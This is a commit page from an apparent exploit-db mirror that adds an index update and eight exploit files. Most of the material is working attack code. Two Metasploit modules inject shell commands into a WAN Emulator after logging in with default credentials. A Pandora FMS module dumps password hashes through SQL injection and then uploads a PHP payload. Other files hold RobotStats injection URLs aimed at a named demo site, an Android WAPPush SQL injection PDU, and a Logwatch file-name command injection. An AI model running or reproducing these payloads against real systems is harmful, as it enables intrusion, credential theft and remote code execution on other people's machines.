bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 11_28_2014

Browse source
This commit is contained in:
Offensive Security 2014-11-28 04:53:33 +00:00
parent e88829222c
commit 9195172fad
16 changed files with 1382 additions and 2 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

18
files.csv
View file

@ -19578,7 +19578,7 @@ id,file,description,date,author,platform,type,port
22353,platforms/linux/remote/22353.c,"BitchX 1.0 - Remote Send_CTCP() Memory Corruption Vulnerability",2003-03-06,eSDee,linux,remote,0
22354,platforms/windows/local/22354.c,"Microsoft Windows 2000 Help Facility .CNT File :Link Buffer Overflow Vulnerability",2003-03-09,s0h,windows,local,0
22355,platforms/cgi/remote/22355.txt,"Thunderstone TEXIS 3.0 'texis.exe' Information Disclosure Vulnerability",2003-03-14,sir.mordred@hushmail.com,cgi,remote,0
22356,platforms/unix/remote/22356.c,"Samba SMB 2.2.x,CIFS/9000 Server A.01.x Packet Assembling Buffer Overflow Vulnerability",2003-03-15,flatline,unix,remote,0
22356,platforms/unix/remote/22356.c,"Samba SMB 2.2.x - CIFS/9000 Server A.01.x Packet Assembling Buffer Overflow Vulnerability",2003-03-15,flatline,unix,remote,0
22357,platforms/asp/webapps/22357.txt,"RSA ClearTrust 4.6/4.7 Login Page Cross Site Scripting Vulnerability",2003-03-15,sir.mordred@hushmail.com,asp,webapps,0
22358,platforms/multiple/dos/22358.cfm,"Sun JDK/SDK 1.3/1.4,IBM JDK 1.3.1,BEA Systems WebLogic 5/6/7 java.util.zip Null Value Denial of Service (1)",2003-03-15,"Marc Schoenefeld",multiple,dos,0
22359,platforms/multiple/dos/22359.xsl,"Sun JDK/SDK 1.3/1.4,IBM JDK 1.3.1,BEA Systems WebLogic 5/6/7 java.util.zip Null Value Denial of Service (2)",2003-03-15,"Marc Schoenefeld",multiple,dos,0
@ -30023,7 +30023,7 @@ id,file,description,date,author,platform,type,port
33333,platforms/windows/remote/33333.rb,"Adobe Flash Player Shader Buffer Overflow",2014-05-12,metasploit,windows,remote,0
33334,platforms/cgi/webapps/33334.txt,"VM Turbo Operations Manager 4.5x - Directory Traversal",2014-05-12,"Jamal Pecou",cgi,webapps,80
33335,platforms/windows/dos/33335.py,"GOM Player 2.2.57.5189 (.ogg) - Crash PoC",2014-05-12,"Aryan Bayaninejad",windows,dos,0
33336,platforms/linux/local/33336.txt,"Linux Kernel 3.3-3.8 - SOCK_DIAG Local Root Exploit",2013-02-24,SynQ,linux,local,0
33336,platforms/linux/local/33336.txt,"Linux Kernel 3.3 < 3.8 - SOCK_DIAG Local Root Exploit",2013-02-24,SynQ,linux,local,0
33337,platforms/osx/dos/33337.c,"Apple Mac OS X 10.5.x 'ptrace' Mutex Handling Local Denial of Service Vulnerability",2009-11-04,"Micheal Turner",osx,dos,0
33338,platforms/linux/dos/33338.c,"Linux Kernel 2.6.x 'fput()' NULL Pointer Dereference Local Denial of Service Vulnerabilty",2009-11-09,"Robin Getz",linux,dos,0
33339,platforms/linux/remote/33339.txt,"CUPS 'kerberos' Parameter Cross Site Scripting Vulnerability",2009-11-09,"Aaron Sigel",linux,remote,0
@ -31831,7 +31831,9 @@ id,file,description,date,author,platform,type,port
35338,platforms/php/webapps/35338.txt,"TaskFreak 0.6.4 rss.php HTTP Referer Header XSS",2011-02-12,LiquidWorm,php,webapps,0
35340,platforms/php/webapps/35340.txt,"Wordpress wpDataTables Plugin 1.5.3 - SQL Injection Vulnerability",2014-11-24,"Claudio Viviani",php,webapps,0
35341,platforms/php/webapps/35341.py,"Wordpress wpDataTables Plugin 1.5.3 - Unauthenticated Shell Upload Vulnerability",2014-11-24,"Claudio Viviani",php,webapps,0
35342,platforms/aix/dos/35342.txt,"RobotStats 1.0 - HTML Injection Vulnerability",2014-11-24,"ZoRLu Bugrahan",aix,dos,0
35343,platforms/php/webapps/35343.txt,"Smarty Template Engine <= 2.6.9 '$smarty.template' PHP Code Injection Vulnerability",2011-02-09,jonieske,php,webapps,0
35344,platforms/php/webapps/35344.txt,"RobotStats 1.0 - (robot param) SQL Injection Vulnerability",2014-11-24,"ZoRLu Bugrahan",php,webapps,0
35345,platforms/hardware/webapps/35345.txt,"TP-Link TL-WR740N - Denial Of Service",2014-11-24,LiquidWorm,hardware,webapps,0
35346,platforms/php/webapps/35346.txt,"DukaPress 2.5.2 - Path Traversal",2014-11-24,"Kacper Szurek",php,webapps,0
35347,platforms/php/webapps/35347.txt,"Dokeos 1.8.6 2 'style' Parameter Cross Site Scripting Vulnerability",2011-02-12,"AutoSec Tools",php,webapps,0
@ -31860,3 +31862,15 @@ id,file,description,date,author,platform,type,port
35373,platforms/php/webapps/35373.txt,"WordPress GD Star Rating Plugin 1.9.7 'wpfn' Parameter Cross Site Scripting Vulnerability",2011-02-22,"High-Tech Bridge SA",php,webapps,0
35374,platforms/php/webapps/35374.txt,"IBM Lotus Sametime Server 8.0 'stcenter.nsf' Cross Site Scripting Vulnerability",2011-02-22,andrew,php,webapps,0
35375,platforms/php/webapps/35375.txt,"Vanilla Forums 2.0.17.x 'p' Parameter Cross Site Scripting Vulnerability",2011-02-22,"Aung Khant",php,webapps,0
35376,platforms/php/webapps/35376.txt,"mySeatXT 0.164 'lang' Parameter Local File Include Vulnerability",2011-02-16,"AutoSec Tools",php,webapps,0
35377,platforms/windows/local/35377.rb,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 (.wax) SEH Buffer Overflow",2014-11-26,"Muhamad Fadzil Ramli",windows,local,0
35379,platforms/windows/dos/35379.go,"Elipse E3 HTTP Denial of Service",2014-11-26,firebitsbr,windows,dos,80
35380,platforms/php/remote/35380.rb,"Pandora FMS SQLi Remote Code Execution",2014-11-26,metasploit,php,remote,80
35381,platforms/php/webapps/35381.txt,"xEpan 1.0.1 - CSRF Vulnerability",2014-11-26,"High-Tech Bridge SA",php,webapps,80
35382,platforms/android/dos/35382.txt,"Android WAPPushManager - SQL Injection",2014-11-26,"Baidu X-Team",android,dos,0
35383,platforms/cgi/webapps/35383.rb,"Device42 WAN Emulator 2.3 Traceroute Command Injection",2014-11-26,"Brandon Perry",cgi,webapps,80
35384,platforms/cgi/webapps/35384.rb,"Device42 WAN Emulator 2.3 Ping Command Injection",2014-11-26,"Brandon Perry",cgi,webapps,80
35385,platforms/php/webapps/35385.pl,"Slider Revolution/Showbiz Pro Shell Upload Exploit",2014-11-26,"Simo Ben Youssef",php,webapps,80
35386,platforms/linux/remote/35386.txt,"Logwatch Log File Special Characters Local Privilege Escalation Vulnerability",2011-02-24,"Dominik George",linux,remote,0
35387,platforms/php/webapps/35387.txt,"phpShop 0.8.1 'page' Parameter Cross Site Scripting Vulnerability",2011-02-25,"Aung Khant",php,webapps,0
35388,platforms/php/webapps/35388.txt,"WordPress HTML 5 MP3 Player with Playlist Plugin - Full Path Disclosure",2014-11-27,"KnocKout inj3ct0r",php,webapps,0

Can't render this file because it is too large.

111
platforms/aix/dos/35342.txt Executable file
View file

@ -0,0 +1,111 @@
# Title : RobotStats v1.0 HTML Injection Vulnerability
# Author : ZoRLu / zorlu@milw00rm.com / submit@milw00rm.com
# Home : http://milw00rm.com / its online
# Twitter : https://twitter.com/milw00rm or @milw00rm
# Date : 22.11.2014
# Demo : http://alpesoiseaux.free.fr/robotstats/
# Download : http://www.robotstats.com/en/robotstats.zip
# Thks : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others
# Birkaciyiadam : Dr.Ly0n, KnocKout, LifeSteaLeR, Nicx (harf sirali :)) )
Desc.:
no security for admin folder (session control, login panel or anyone... maybe its different vulnerability)
and no any filter for html code at robots.lib.php. you can inject your html code or xss code.
html inj.:
target.com/robotstats/admin/robots.php?rub=ajouter&nom=<font color=red size=10><body bgcolor=black>NiCKNAME(orwriteyourindexcode)&actif=1&user_agent=writeanything(orhtmlcode)&ip1=&ip2=&detection=detection_user_agent&descr_fr=&descr_en=&url=
after you go here:
target.com/robotstats/info-robot.php?robot=(robot id)
or
target.com/robotstats/admin/robots.php you will see your html page
analysis: (/admin/robots.php)
include "robots.lib.php"; //line 26
else if ($rub == "ajouter")
{
updateDataBase($robot, $nom, $actif, $user_agent, $ip1, $ip2, $detection, $descr_fr, $descr_en, $url); //line 65 (we will be analysis to robots.lib.php for line)
}
analysis: (/admin/robots.lib.php)
you look code. you will see blank control for "name" and "user agent" but will'nt see any filter for inject (// look line 203 no any filter) no any control or filter for code inject.
function updateDataBase($robot, $nom, $actif, $user_agent, $ip1, $ip2, $detection, $descr_fr, $descr_en, $url)
//line 163 (remember function line 65 in robots.php)
{
global $RS_LANG, $RS_LANGUE, $RS_TABLE_ROBOTS, $RS_DETECTION_USER_AGENT, $RS_DETECTION_IP;
// dans tous les cas :
echo "<p class='normal'><a class='erreur'> ";
$msg = "";
// test du nom
if ($nom == '') //line 172 control of blank or not blank
{
$msg = $RS_LANG["BadRobotName"];
}
// test selon le mode de detection
if ($detection == $RS_DETECTION_USER_AGENT) //line 178 control of your "detection mode" choice
{
if ($user_agent == '') //line 180 control of blank or not blank
{
$msg = $RS_LANG["BadUserAgent"];
}
}
else if ($detection == $RS_DETECTION_IP) //line 185 control of your "detection mode" choice
{
if ( ($ip1 == '') && ($ip2 == '') ) //line 187 control of your "ip1 and ip2" choice
{
$msg = $RS_LANG["IPNotSpecified"];
}
}
else
{
$msg = $RS_LANG["BadDetectionMode"];
}
if ($msg != "")
{
echo $msg;
}
else
{
$liste_champs = "nom, actif, user_agent, ip1, ip2, detection, descr_fr, descr_en, url"; // line 203 no any filter
$liste_valeurs = "\"$nom\", \"$actif\", \"$user_agent\", \"$ip1\", \"$ip2\", \"$detection\", \"$descr_fr\", \"$descr_en\", \"$url\"";
if ($robot > 0) // cas d'une modification et non d'un ajout //line 205 control of your choice "wanna update any bot or add new bot"
{
$liste_champs .= ", id";
$liste_valeurs .= ", '$robot'";
$sql = "REPLACE INTO ".$RS_TABLE_ROBOTS." ($liste_champs) VALUES ($liste_valeurs)";
$res = mysql_query($sql) or erreurServeurMySQL($sql);
echo $RS_LANG["RobotUpdated"];
}
else
{
$sql = "INSERT INTO ".$RS_TABLE_ROBOTS." ($liste_champs) VALUES ($liste_valeurs)";
$res = mysql_query($sql) or erreurServeurMySQL($sql);
echo $RS_LANG["RobotAdded"];
}
}
for demo:
http://alpesoiseaux.free.fr/robotstats/admin/robots.php?rub=ajouter&nom=<font color=red size=10><body bgcolor=black>NiCKNAME&actif=1&user_agent=writeanything(orhtmlcode)&ip1=&ip2=&detection=detection_user_agent&descr_fr=&descr_en=&url=
after you go here:
http://alpesoiseaux.free.fr/robotstats/info-robot.php?robot=(robot id)
or
http://alpesoiseaux.free.fr/robotstats/admin/robots.php
you will see your html page

143
platforms/android/dos/35382.txt Executable file
View file

@ -0,0 +1,143 @@
INTRODUCTION
==================================
In Android <5.0, a SQL injection vulnerability exists in the opt module WAPPushManager, attacker can remotely send malformed WAPPush message to launch any activity or service in the victim's phone (need permission check)
DETAILS
==================================
When a WAPPush message is received, the raw pdu is processed by dispatchWapPdu method in com\android\internal\telephony\WapPushOverSms.java
Here the pdu is parsed to get the contentType & wapAppId:
String mimeType = pduDecoder.getValueString();
...
/**
* Seek for application ID field in WSP header.
* If application ID is found, WapPushManager substitute the message
* processing. Since WapPushManager is optional module, if WapPushManager
* is not found, legacy message processing will be continued.
*/
if (pduDecoder.seekXWapApplicationId(index, index + headerLength - 1)) {
index = (int) pduDecoder.getValue32();
pduDecoder.decodeXWapApplicationId(index);
String wapAppId = pduDecoder.getValueString();
if (wapAppId == null) {
wapAppId = Integer.toString((int) pduDecoder.getValue32());
}
String contentType = ((mimeType == null) ?
Long.toString(binaryContentType) : mimeType);
if (DBG) Rlog.v(TAG, "appid found: " + wapAppId + ":" + contentType);
The wapAppId & contentType can be literal string embeded in the pdu, to prove this, we can launch Android 4.4 emulator and send sms pdu by telnet console
Type the following command in telnet console:
sms pdu 0040000B915121551532F40004800B05040B84C0020003F001010A065603B081EAAF2720756e696f6e2073656c65637420302c27636f6d2e616e64726f69642e73657474696e6773272c27636f6d2e616e64726f69642e73657474696e67732e53657474696e6773272c302c302c302d2d200002066A008509036D6F62696C65746964696E67732E636F6D2F0001
And watch the radio logcat message in emulator, it prints out the extracted malicious appid:
' union select 0,'com.android.settings','com.android.settings.Settings',0,0,0--
However, since the WAPPushManager is optional, it is not installed in the emulator, so it then prints "wap push manager not found!"
But if the WAPPushManager is installed, the extracted wapAppId & contentType will be send to its method processMessage:
try {
boolean processFurther = true;
IWapPushManager wapPushMan = mWapPushManager;
if (wapPushMan == null) {
if (DBG) Rlog.w(TAG, "wap push manager not found!");
} else {
Intent intent = new Intent();
intent.putExtra("transactionId", transactionId);
intent.putExtra("pduType", pduType);
intent.putExtra("header", header);
intent.putExtra("data", intentData);
intent.putExtra("contentTypeParameters",
pduDecoder.getContentParameters());
int procRet = wapPushMan.processMessage(wapAppId, contentType, intent);
So we go on checking the source code of WAPPushManager:
https://android.googlesource.com/platform/frameworks/base/+/android-4.4.4_r2.0.1/packages/WAPPushManager/
In the method processMessage, the app_id and content_type is used in the method queryLastApp:
public int processMessage(String app_id, String content_type, Intent intent)
throws RemoteException {
Log.d(LOG_TAG, "wpman processMsg " + app_id + ":" + content_type);
WapPushManDBHelper dbh = getDatabase(mContext);
SQLiteDatabase db = dbh.getReadableDatabase();
WapPushManDBHelper.queryData lastapp = dbh.queryLastApp(db, app_id, content_type);
db.close();
Then in the method queryLastApp, both app_id and content_type is concatenated without any escaping to build the rawQuery sql input,
protected queryData queryLastApp(SQLiteDatabase db,
String app_id, String content_type) {
String sql = "select install_order, package_name, class_name, "
+ " app_type, need_signature, further_processing"
+ " from " + APPID_TABLE_NAME
+ " where x_wap_application=\'" + app_id + "\'"
+ " and content_type=\'" + content_type + "\'"
+ " order by install_order desc";
if (DEBUG_SQL) Log.v(LOG_TAG, "sql: " + sql);
Cursor cur = db.rawQuery(sql, null);
Obviously, this is a SQL injection, for example, if app_id is as follows:
' union select 0,'com.android.settings','com.android.settings.Settings',0,0,0--
Then the package_name & class_name of query result would be:
"com.android.settings" and "com.android.settings.Setttings"
OK, then we return back to the method processMessage of WAPPushManager
The appType, packageName, className is fully controllable, which will be used to set the component of an intent to start a activity or service
That means, attacker can remotely launch any activity or service by construct malformed WAPPush Message (need permission check)
if (lastapp.appType == WapPushManagerParams.APP_TYPE_ACTIVITY) {
//Intent intent = new Intent(Intent.ACTION_MAIN);
intent.setClassName(lastapp.packageName, lastapp.className);
intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
try {
mContext.startActivity(intent);
} catch (ActivityNotFoundException e) {
Log.w(LOG_TAG, "invalid name " +
lastapp.packageName + "/" + lastapp.className);
return WapPushManagerParams.INVALID_RECEIVER_NAME;
}
} else {
intent.setClassName(mContext, lastapp.className);
intent.setComponent(new ComponentName(lastapp.packageName,
lastapp.className));
if (mContext.startService(intent) == null) {
Log.w(LOG_TAG, "invalid name " +
lastapp.packageName + "/" + lastapp.className);
return WapPushManagerParams.INVALID_RECEIVER_NAME;
}
}
This has been fixed in android 5.0 (android bug id 17969135)
https://android.googlesource.com/platform/frameworks/base/+/48ed835468c6235905459e6ef7df032baf3e4df6
TIMELINE
==================================
11.10.2014 Initial report to Android Security Team with the POC
14.10.2014 Reply from Android Security Team "are looking into it"
04.11.2014 Android 5.0 source code is open, the fix for this issue is found in change log, request status update
08.11.2014 Reply from Android Security Team "have fixed the issue in L (which is now in AOSP) and have provided patches to partners"
09.11.2014 Contact MITRE about this issue
17.11.2014 CVE-2014-8507 assigned
26.11.2014 Public Disclosure
IDENTIFIERS
==================================
CVE-2014-8507
Android id 17969135
CREDITS
==================================
WangTao (neobyte) of Baidu X-Team
WangYu of Baidu X-Team
Zhang Donghui of Baidu X-Team
--
BAIDU X-TEAM (xteam.baidu.com)
An external link of this advisory can be found at http://xteam.baidu.com/?p=167

103
platforms/cgi/webapps/35383.rb Executable file
View file

@ -0,0 +1,103 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'WAN Emulator v2.3 Command Execution',
'Description' => %q{
},
'License' => MSF_LICENSE,
'Privileged' => true,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Author' =>
[
'Brendan Coles <bcoles[at]gmail.com>', # Discovery and exploit
],
'References' =>
[
],
'Payload' =>
{
'Space' => 1024,
'BadChars' => "",
'DisableNops' => true,
#'Compat' =>
# {
# 'PayloadType' => 'cmd',
# 'RequiredCmd' => 'generic netcat netcat-e',
# }
},
'DefaultOptions' =>
{
'ExitFunction' => 'none'
},
'Targets' =>
[
['Automatic Targeting', { 'auto' => true }]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 12 2012'
))
end
def exploit
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'accounts', 'login/'),
})
cookie = res.headers['Set-Cookie']
csrf = $1 if res.body =~ / name='csrfmiddlewaretoken' value='(.*)' \/><\/div>/
post = {
'csrfmiddlewaretoken' => csrf,
'username' => 'd42admin',
'password' => 'default',
'next' => '/'
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'accounts', 'login/'),
'vars_post' => post,
'method' => 'POST',
'cookie' => cookie
})
unless res.code == 302
fail_with("auth failed")
end
cookie = res.headers['Set-Cookie']
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'ping/'),
'cookie' => cookie
})
cookie = res.headers['Set-Cookie']
csrf = $1 if res.body =~ / name='csrfmiddlewaretoken' value='(.*)' \/><\/div>/
post = {
'csrfmiddlewaretoken' => csrf,
'traceip' => "www.google.com`echo #{Rex::Text.encode_base64(payload.encoded)}|base64 --decode|sh`",
'trace' => ''
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'ping/'),
'method' => "POST",
'vars_post' => post,
'cookie' => cookie
})
end
end

103
platforms/cgi/webapps/35384.rb Executable file
View file

@ -0,0 +1,103 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'WAN Emulator v2.3 Command Execution',
'Description' => %q{
},
'License' => MSF_LICENSE,
'Privileged' => true,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Author' =>
[
'Brendan Coles <bcoles[at]gmail.com>', # Discovery and exploit
],
'References' =>
[
],
'Payload' =>
{
'Space' => 1024,
'BadChars' => "",
'DisableNops' => true,
#'Compat' =>
# {
# 'PayloadType' => 'cmd',
# 'RequiredCmd' => 'generic netcat netcat-e',
# }
},
'DefaultOptions' =>
{
'ExitFunction' => 'none'
},
'Targets' =>
[
['Automatic Targeting', { 'auto' => true }]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 12 2012'
))
end
def exploit
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'accounts', 'login/'),
})
cookie = res.headers['Set-Cookie']
csrf = $1 if res.body =~ / name='csrfmiddlewaretoken' value='(.*)' \/><\/div>/
post = {
'csrfmiddlewaretoken' => csrf,
'username' => 'd42admin',
'password' => 'default',
'next' => '/'
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'accounts', 'login/'),
'vars_post' => post,
'method' => 'POST',
'cookie' => cookie
})
unless res.code == 302
fail_with("auth failed")
end
cookie = res.headers['Set-Cookie']
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'ping/'),
'cookie' => cookie
})
cookie = res.headers['Set-Cookie']
csrf = $1 if res.body =~ / name='csrfmiddlewaretoken' value='(.*)' \/><\/div>/
post = {
'csrfmiddlewaretoken' => csrf,
'pingip' => "www.google.com`echo #{Rex::Text.encode_base64(payload.encoded)}|base64 --decode|sh`",
'ping' => ''
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'ping/'),
'method' => "POST",
'vars_post' => post,
'cookie' => cookie
})
end
end

7
platforms/linux/remote/35386.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/46554/info
Logwatch is prone to a local privilege-escalation vulnerability.
Local attackers can exploit this issue execute arbitrary code with superuser privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition.
% echo "fake" > â??/var/log/httpd/fakee;who;access_log.2â??

317
platforms/php/remote/35380.rb Executable file
View file

@ -0,0 +1,317 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => 'Pandora FMS SQLi Remote Code Execution',
'Description' => %q{
This module attempts to exploit multiple issues in order to gain remote
code execution under Pandora FMS version <= 5.0 SP2. First, an attempt
to authenticate using default credentials is performed. If this method
fails, a SQL injection vulnerability is leveraged in order to extract
the "Auto Login" password hash. If this value is not set, the module
will then extract the administrator account's MD5 password hash.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Lincoln <Lincoln[at]corelan.be>', # Discovery, Original Proof of Concept
'Jason Kratzer <pyoor[at]corelan.be>' # Metasploit Module
],
'References' =>
[
['URL', 'http://pandorafms.com/downloads/whats_new_5-SP3.pdf'],
['URL', 'http://blog.pandorafms.org/?p=2041']
],
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' =>
[
['Pandora FMS version <= 5.0 SP2', {}]
],
'Privileged' => false,
'Payload' =>
{
'Space' => 50000,
'DisableNops' => true,
},
'DisclosureDate' => "Feb 1 2014",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The URI of the vulnerable Pandora FMS instance', '/pandora_console/']),
OptString.new('USER', [false, 'The username to authenticate with', 'admin']),
OptString.new('PASS', [false, 'The password to authenticate with', 'pandora']),
], self.class)
end
def uri
target_uri.path
end
def check
vprint_status("#{peer} - Trying to detect installed version")
version = nil
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'index.php')
})
if res && res.code == 200 && res.body =~ /Pandora FMS - the Flexible Monitoring System/
if res.body =~ /<div id="ver_num">v(.*?)<\/div>/
version = $1
else
return Exploit::CheckCode::Detected
end
end
unless version.nil?
vprint_status("#{peer} - Pandora FMS #{version} found")
if Gem::Version.new(version) <= Gem::Version.new('5.0SP2')
return Exploit::CheckCode::Appears
end
end
Exploit::CheckCode::Safe
end
# Attempt to login with credentials (default admin:pandora)
def authenticate
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'index.php'),
'vars_get' => {
'login' => "1",
},
'vars_post' => {
'nick' => datastore['USER'],
'pass' => datastore['PASS'],
'Login' => 'Login',
}
})
return auth_succeeded?(res)
end
# Attempt to login with auto login and SQLi
def login_hash
clue = rand_text_alpha(8)
sql_clue = clue.each_byte.map { |b| b.to_s(16) }.join
# select value from tconfig where token = 'loginhash_pwd';
sqli = "1' AND (SELECT 2243 FROM(SELECT COUNT(*),CONCAT(0x#{sql_clue},(SELECT MID((IFNULL(CAST"
sqli << "(value AS CHAR),0x20)),1,50) FROM tconfig WHERE token = 0x6c6f67696e686173685f707764 "
sqli << "LIMIT 0,1),0x#{sql_clue},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP "
sqli << "BY x)a) AND 'msf'='msf"
password = inject_sql(sqli, clue)
if password && password.length != 0
print_status("#{peer} - Extracted auto login password (#{password})")
else
print_error("#{peer} - No auto login password has been defined!")
return false
end
print_status("#{peer} - Attempting to authenticate using (admin:#{password})")
# Attempt to login using login hash password
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'index.php'),
'vars_get' => {
'loginhash' => 'auto',
},
'vars_post' => {
'loginhash_data' => Rex::Text.md5("admin#{password}"),
'loginhash_user' => 'admin',
}
})
return auth_succeeded?(res)
end
def auth_succeeded?(res)
if res && res.code == 200 && res.body.include?('Welcome to Pandora FMS')
print_status("#{peer} - Successfully authenticated!")
print_status("#{peer} - Attempting to retrieve session cookie")
@cookie = res.get_cookies
if @cookie.include?('PHPSESSID')
print_status("#{peer} - Successfully retrieved session cookie: #{@cookie}")
return true
else
print_error("#{peer} - Error retrieving cookie!")
end
else
print_error("#{peer} - Authentication failed!")
end
false
end
def extract
# Generate random string and convert to hex
clue = rand_text_alpha(8)
hex_clue = clue.each_byte.map { |b| b.to_s(16) }.join
# select password from tusuario where id_user = 0;
sqli = "test' AND (SELECT 5612 FROM(SELECT COUNT(*),CONCAT(0x#{hex_clue},(SELECT MID((IFNULL"
sqli << "(CAST(password AS CHAR),0x20)),1,50) FROM tusuario WHERE id_user = 0 LIMIT 0,1)"
sqli << ",0x#{hex_clue},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY "
sqli << "x)a) AND 'msf'='msf"
password = inject_sql(sqli, clue)
if password && password.length != 0
print_good("#{peer} - Extracted admin password hash, unsalted md5 - [ #{password} ]")
else
print_error("#{peer} - Unable to extract password hash!")
return false
end
end
def inject_sql(sql, fence_post)
# Extract password hash from database
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'mobile', 'index.php'),
'vars_post' => {
'action' => 'login',
'user' => sql,
'password' => 'pass',
'input' => 'Login'
}
})
result = nil
if res && res.code == 200
match = res.body.match(/(?<=#{fence_post})(.*)(?=#{fence_post})/)
if match
result = match[1]
else
print_error("#{peer} - SQL injection failed")
end
end
result
end
def upload
# Extract hash and hash2 from response
res = send_request_cgi({
'method' => 'GET',
'cookie' => @cookie,
'uri' => normalize_uri(uri, 'index.php'),
'vars_get' => {
'sec' => 'gsetup',
'sec2' => 'godmode/setup/file_manager'
}
})
if res && res.code == 200 && res.body =~ /(?<=input type="submit" id="submit-go")(.*)(?=<input id="hidden-directory" name="directory" type="hidden")/
form = $1
# Extract hash
if form =~ /(?<=name="hash" type="hidden" value=")(.*?)(?=" \/>)/
hash = $1
else
print_error("#{peer} - Could not extract hash from response!")
fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!")
end
# Extract hash2
if form =~ /(?<=name="hash2" type="hidden" value=")(.*?)(?=" \/>)/
hash2 = $1
else
print_error("#{peer} - Could not extract hash2 from response!")
fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!")
end
# Extract real_directory
if form =~ /(?<=name="real_directory" type="hidden" value=")(.*?)(" \/>)/
real_directory = $1
else
print_error("#{peer} - Could not extract real_directory from response!")
fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!")
end
else
print_error("#{peer} - Could not identify upload form!")
fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!")
end
# Upload script
@payload_name = "#{rand_text_alpha(8)}.php"
post_data = Rex::MIME::Message.new
post_data.add_part("<?php #{payload.encoded} ?>", 'text/plain', nil, %Q^form-data; name="file"; filename="#{@payload_name}"^)
post_data.add_part('', nil, nil, 'form-data; name="unmask"')
post_data.add_part('Go', nil, nil, 'form-data; name="go"')
post_data.add_part(real_directory, nil, nil, 'form-data; name="real_directory"')
post_data.add_part('images', nil, nil, 'form-data; name="directory"')
post_data.add_part("#{hash}", nil, nil, 'form-data; name="hash"')
post_data.add_part("#{hash2}", nil, nil, 'form-data; name="hash2"')
post_data.add_part('1', nil, nil, 'form-data; name="upload_file_or_zip"')
print_status("#{peer} - Attempting to upload payload #{@payload_name}...")
res = send_request_cgi({
'method' => 'POST',
'cookie' => @cookie,
'uri' => normalize_uri(uri, 'index.php'),
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'data' => post_data.to_s,
'vars_get' => {
'sec' => 'gsetup',
'sec2' => 'godmode/setup/file_manager'
}
})
if res && res.code == 200 && res.body.include?("Upload correct")
register_file_for_cleanup(@payload_name)
print_status("#{peer} - Successfully uploaded payload")
else
fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!")
end
end
def exploit
# First try to authenticate using default or user-supplied credentials
print_status("#{peer} - Attempting to authenticate using (#{datastore['USER']}:#{datastore['PASS']})")
auth = authenticate
unless auth
print_status("#{peer} - Attempting to extract auto login hash via SQLi")
auth = login_hash
end
unless auth
print_status("#{peer} - Attempting to extract admin password hash with SQLi")
extract
fail_with(Failure::NoAccess, "#{peer} - Unable to perform remote code execution!")
end
print_status("#{peer} - Uploading PHP payload...")
upload
print_status("#{peer} - Executing payload...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'images', @payload_name),
'cookie' => @cookie
}, 1)
end
end

48
platforms/php/webapps/35344.txt Executable file
View file

@ -0,0 +1,48 @@
# Title : RobotStats v1.0 (robot param) SQL Injection Vulnerability
# Author : ZoRLu / zorlu@milw00rm.com / submit@milw00rm.com
# Home : http://milw00rm.com / its online
# Twitter : https://twitter.com/milw00rm or @milw00rm
# Date : 22.11.2014
# Demo : http://alpesoiseaux.free.fr/robotstats/
# Download : http://www.robotstats.com/en/robotstats.zip
# Thks : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others
# Birkaciyiadam : Dr.Ly0n, KnocKout, LifeSteaLeR, Nicx (harf sirali :)) )
sql inj.:
target.com/robotstats/admin/robots.php?rub=modif&robot=0x90+union+select+1,2,3,4,5,database(),7,8,9,10
you look other files for sql example (/robotstats/info-robot.php?robot=?)
analysis: (/admin/robots.php)
no security for admin folder (session control, login panel or anyone... maybe its different vulnerability)
include "robots.lib.php"; //line 26
